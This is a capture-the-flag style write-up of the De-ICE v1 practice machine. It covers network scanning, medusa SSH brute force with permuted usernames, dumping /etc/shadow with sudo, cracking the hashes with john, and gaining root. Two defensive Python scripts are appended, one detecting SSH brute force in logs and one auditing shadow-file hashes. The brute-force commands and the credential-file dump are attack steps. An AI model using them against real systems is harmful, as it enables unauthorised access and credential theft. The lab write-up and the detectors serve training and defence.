Title: [Write-up] DE-Ice v1 controlled security environment
Posted by: cibergolen on 2 February 2012, 23:21

This time I bring you DE-Ice v1.0.
The security distributions can be downloaded from Heorot.net.

What will we need?
- Two virtual machines
- De-ICE v1
- Backtrack 5
- A dictionary of common English passwords

What will our objectives be?
- Network mapping
- Network analysis
- Brute force against a service
- Brute force against shadow
- Root

Rules?
- No exploits

Here we go

We scan the networks to locate our prey.

Quote:
netdiscover
Currently scanning: 192.168.1.0/16 | Screen View: ARP Reply
1 Captured ARP Reply packets, from 1 hosts. Total size: 60
_____________________________________________________________________________
IP              At MAC Address       Count  Len  MAC Vendor
-----------------------------------------------------------------------------
192.168.1.100   08:00:27:b1:50:12    01     060  CADMUS COMPUTER SYSTEMS

We identify services with NMAP:

Quote:
root@bt:/# nmap -sV 192.168.1.100
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-02 22:07 CET
Nmap scan report for 192.168.1.100
Host is up (0.0070s latency).
Not shown: 992 filtered ports
PORT     STATE   SERVICE   VERSION
20/tcp   closed  ftp-data
21/tcp   open    ftp       vsftpd (broken: could not bind listening IPv4 socket)
22/tcp   open    ssh       OpenSSH 4.3 (protocol 1.99)
25/tcp   open    smtp      Sendmail 8.13.7/8.13.7
80/tcp   open    http      Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp  open    pop3      Openwall popa3d
143/tcp  open    imap      UW imapd 2004.357
443/tcp  closed  https
MAC Address: 08:00:27:B1:50:12 (Cadmus Computer Systems)
Service Info: Host: slax.example.net; OS: Unix
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.29 seconds

Footprinting

We see that we have several services, except one: FTP. It does not allow IPv4 connections. We go in via HTTP and notice that the page shows us some e-mail addresses. Let's permute them.
This is what I got:

Quote:
addams
aadams
adaams
damsaa
adamsa
banterb
bbanter
banterb
anterbb
bbanteerbb
coffeec
cooffec
ccoffee
coooffe
cooofef
coofefc
cooffee

We launch medusa and try our luck.

Quote:
medusa -h 192.168.1.100 -U user -P user -M ssh

Bingo! It finds a user. Same username and password.

Quote:
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adaams (3 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: damsaa (4 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adamsa (5 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: banterb (6 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: bbanter (7 of 17 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: bbanter Password: bbanter [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: addams (1 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: aadams (2 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adaams (3 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: damsaa (4 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adamsa (5 of 17 complete)

Disappointment

I log in via SSH:

Quote:
root@bt:/pentest/passwords/john# ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password:

But if we try to cat /etc/shadow, as expected, it tells us that our next command is:

Quote:
exit

If we read /etc/passwd first, we will see that the user aadams is set up with different permissions.

Calling on medusa for help

Let's try another dictionary:

Quote:
medusa -h 192.168.1.100 -U user -P list.lst -M ssh

Quote:
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: fuckyou (578 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: matthew (579 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: miller (560 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: ou82 (561 of 675 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: aadams Password: nostradamus [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: tiger (562 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: trustno1 (563 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: 12345678 (564 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: alex (565 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: windows (566 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: flipper (567 of 675 complete)

It shows us the user aadams, with the corresponding password. We log in via SSH and get the file.

Root Success

Quote:
root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
aadams@slax:~$

We exit.

Quote:
exit

We crack it.

Quote:
root@bt:/pentest/passwords/john# ./john --rules --wordlist=list.lst shadow

I leave the result to your imagination, so as not to spoil the challenge by giving away the password.

Final result:

Quote:
root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ su
Password: *****
root@slax:/home/aadams# whoami
root
root@slax:/home/aadams#

Until next time.

Dedicated to: Oversec, CPH, H-Sec, EH

Regards
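Both medusa runs in the write-up leave the same trace on the target: a burst of failed sshd password logins from a single source that cycles through many usernames, followed by one accepted login. As an added example (not part of the original post), here is a small Python detector for that pattern, run over constructed auth.log lines in OpenSSH's syslog format. The source address 192.168.1.50, the PIDs and the timestamps are made up for the sample; the thresholds are my own choices and would be tuned to the environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of OpenSSH auth.log lines (syslog format, no year), modelled on
# the burst a medusa-style dictionary run leaves behind: one source address tries
# several usernames within a few seconds, then one attempt succeeds. The address
# 192.168.1.50, the PIDs and the timestamps are invented for this example.
SAMPLE_LOG = """\
Feb  2 22:14:58 slax sshd[2011]: Failed password for invalid user addams from 192.168.1.50 port 40001 ssh2
Feb  2 22:14:59 slax sshd[2013]: Failed password for aadams from 192.168.1.50 port 40002 ssh2
Feb  2 22:14:59 slax sshd[2015]: Failed password for invalid user adaams from 192.168.1.50 port 40003 ssh2
Feb  2 22:15:00 slax sshd[2017]: Failed password for invalid user damsaa from 192.168.1.50 port 40004 ssh2
Feb  2 22:15:00 slax sshd[2019]: Failed password for invalid user adamsa from 192.168.1.50 port 40005 ssh2
Feb  2 22:15:01 slax sshd[2021]: Failed password for invalid user banterb from 192.168.1.50 port 40006 ssh2
Feb  2 22:15:02 slax sshd[2023]: Accepted password for bbanter from 192.168.1.50 port 40007 ssh2
Feb  2 22:30:10 slax sshd[2101]: Accepted password for ccoffee from 192.168.1.7 port 51000 ssh2
"""

# Matches sshd's password-authentication result lines; "invalid user" marks names
# that do not exist on the box (a strong hint that a username list is being tried).
LINE_RE = re.compile(
    r"^(?P<month>\w{3})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

WINDOW_SECONDS = 60     # sliding window kept per source address (assumed tuning value)
FAILURE_THRESHOLD = 5   # failures inside the window that trigger an alert
USER_THRESHOLD = 3      # distinct usernames inside the window that trigger an alert


def parse_events(text, year=2012):
    """Turn sshd password-auth lines into sorted (timestamp, result, user, ip) tuples.

    Syslog lines carry no year, so the caller supplies it. Lines that are not
    password-authentication results (key auth, disconnects, ...) are skipped.
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp = f"{year} {m['month']} {m['day']} {m['time']}"
        ts = datetime.strptime(stamp, "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return sorted(events)


def detect_bruteforce(events):
    """Return a list of (alert_type, ip, detail) tuples.

    'ssh_bruteforce' fires once per source when, inside WINDOW_SECONDS, it reaches
    FAILURE_THRESHOLD failures or USER_THRESHOLD distinct usernames (the second
    rule catches a username list being walked even when each name is tried once).
    'login_after_bruteforce' fires when an already-flagged source gets an accepted
    login while its failures are still inside the window: the credential it
    found is the one to reset first.
    """
    alerts = []
    recent = defaultdict(deque)  # ip -> deque of (timestamp, user) recent failures
    flagged = set()
    for ts, result, user, ip in events:
        window = recent[ip]
        while window and (ts - window[0][0]).total_seconds() > WINDOW_SECONDS:
            window.popleft()  # drop failures that fell out of the window
        if result == "Failed":
            window.append((ts, user))
            users = {u for _, u in window}
            if ip not in flagged and (
                len(window) >= FAILURE_THRESHOLD or len(users) >= USER_THRESHOLD
            ):
                flagged.add(ip)
                alerts.append(
                    ("ssh_bruteforce", ip,
                     f"{len(window)} failures across {len(users)} users in {WINDOW_SECONDS}s")
                )
        elif ip in flagged and window:
            alerts.append(("login_after_bruteforce", ip, user))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_events(SAMPLE_LOG)):
        print(*alert)
```

On the sample the detector raises the brute-force alert at the third failure (three distinct usernames already) and then a second, higher-severity alert when the same source logs in as bbanter; the unrelated login from 192.168.1.7 produces nothing. Keying on distinct usernames rather than only on the failure count matters here because the post's first medusa run tries each username against a short list, so per-user failure counts stay low.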
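The shadow file dumped above is what makes the final john run cheap: every real account uses MD5-crypt (the $1$ prefix), and root's entry has no maximum password age. As an added example (not part of the original post), here is a Python audit of the /etc/shadow format, run over the entries the write-up printed. It classifies each hash by its crypt(3) identifier prefix, flags weak algorithms, accounts that never expire and passwords not changed in over a year. The `today` date is pinned to the post's date so the ages are reproducible, and the remediation wording in the findings is mine.

```python
from datetime import date, timedelta

# The /etc/shadow entries printed in the write-up (system accounts trimmed to two;
# they all look alike). Standard field order:
#   name:hash:lastchange:min:max:warn:inactive:expire:reserved
# lastchange is counted in days since 1970-01-01.
SAMPLE_SHADOW = """\
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
sshd:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
"""

# crypt(3) identifier prefix -> (algorithm name, considered weak today)
HASH_PREFIXES = {
    "$1$": ("md5crypt", True),
    "$2a$": ("bcrypt", False),
    "$2b$": ("bcrypt", False),
    "$2y$": ("bcrypt", False),
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),
    "$y$": ("yescrypt", False),
}

EPOCH = date(1970, 1, 1)


def classify_hash(field):
    """Map the password field of a shadow entry to (algorithm, weak)."""
    if field == "":
        return "none", True          # empty field: no password is required at all
    if field[0] in "*!":
        return "locked", False       # '*' or '!' prefix: password login disabled
    for prefix, (name, weak) in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name, weak
    if len(field) == 13 and "$" not in field:
        return "descrypt", True      # traditional DES crypt: 2-char salt + 11 chars
    return "unknown", True


def audit_shadow(text, today=date(2012, 2, 2), max_age_days=365):
    """Return {user: [finding, ...]}; an empty list means nothing was flagged."""
    report = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            report[fields[0]] = ["malformed entry (expected 9 colon-separated fields)"]
            continue
        user, pw, lastchg, _minage, maxage = fields[:5]
        findings = []
        algo, weak = classify_hash(pw)
        if algo == "none":
            findings.append("empty password field: login without a password is possible")
        elif algo != "locked":
            if weak:
                findings.append(f"weak hash ({algo}): rehash with sha512crypt or yescrypt")
            if maxage in ("", "99999"):
                findings.append("password never expires (max age unset or 99999)")
            if lastchg.isdigit():
                changed = EPOCH + timedelta(days=int(lastchg))
                age = (today - changed).days
                if age > max_age_days:
                    findings.append(f"password unchanged for {age} days (since {changed})")
        report[user] = findings
    return report


if __name__ == "__main__":
    for user, findings in audit_shadow(SAMPLE_SHADOW).items():
        print(user, "->", findings or "ok")
```

Run against the sample, the locked system accounts come back clean, while root and the three user accounts are each flagged three times: MD5-crypt hash, no expiry, and a password last changed in February 2007 (13553 days after the epoch is 2007-02-09). A modern `pam_unix`/`libxcrypt` setup with `sha512` or `yescrypt` as the default method removes the first finding on the next password change; the other two are `chage` settings.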